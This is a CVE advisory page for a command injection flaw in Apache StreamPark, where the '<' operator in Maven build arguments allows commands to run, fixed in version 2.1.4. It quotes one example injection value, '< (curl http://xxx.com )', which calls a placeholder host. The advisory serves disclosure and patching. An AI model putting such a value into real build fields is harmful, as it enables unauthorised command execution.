CVE-2023-52291
CVSS V2 None
CVSS V3 None
Description
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection,
Mitigation:
all users should upgrade to 2.1.4, The "<" operator will blocked。
Overview
- CVE ID
- CVE-2023-52291
- Assigner
- apache
- Vulnerability Status
- PUBLISHED
- Published Version
- 2024-07-17T08:16:12.520Z
- Last Modified Date
- 2024-07-17T08:16:12.520Z
Weakness Enumerations
References
Reference URL | Reference Tags |
---|---|
https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf | vendor-advisory |
http://www.openwall.com/lists/oss-security/2024/07/17/1 |
Sources
Source Name | Source URL |
---|---|
NIST | https://nvd.nist.gov/vuln/detail/CVE-2023-52291 |
MITRE | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52291 |
History
Created | Old Value | New Value | Data Type | Notes |
---|---|---|---|---|
2024-07-18 13:01:54 | Added to TrackCVE |